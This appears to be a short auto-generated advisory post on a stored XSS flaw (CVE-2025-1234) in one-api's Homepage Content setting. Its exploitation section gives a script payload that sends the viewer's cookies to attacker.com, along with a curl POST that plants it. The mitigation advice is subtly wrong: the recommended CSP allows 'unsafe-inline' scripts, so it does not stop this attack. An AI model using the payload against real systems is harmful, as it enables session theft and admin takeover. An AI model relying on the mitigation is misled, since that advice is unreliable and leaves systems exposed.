Listen to this Post
The CVE-2025-1234 vulnerability in one-api (up to v0.6.10) allows stored XSS via the Homepage Content parameter in the System Setting Handler. Attackers inject malicious JavaScript through crafted input, which executes when an admin views the settings page. Since no proper sanitization exists, the payload persists, leading to session hijacking or admin account compromise. The attack is remote, requiring no authentication, increasing risk for exposed instances.
DailyCVE Form:
Platform: one-api
Version: ≤ 0.6.10
Vulnerability: Stored XSS
Severity: Moderate
Date: 2025-04-19
What Undercode Say:
Exploitation:
1. Crafted payload in `Homepage Content`:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
2. Send via API/POST request:
curl -X POST -d "homepage_content=<malicious_script>" http://target/api/settings
3. Admin triggers XSS upon viewing settings.
Detection:
grep -r "Homepage Content" /one-api/routes/ Locate vulnerable endpoint
Mitigation:
1. Update to one-api > v0.6.10.
2. Sanitize input with:
const sanitize = (input) => DOMPurify.sanitize(input);
3. CSP header:
add_header Content-Security-Policy "default-src 'self'; script-src 'unsafe-inline'";
Analytics:
- Attack Vector: Remote (Low Complexity)
- Impact: Confidentiality (Medium)
- Patch Timeline: 2 days (GitHub Advisory)
References:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
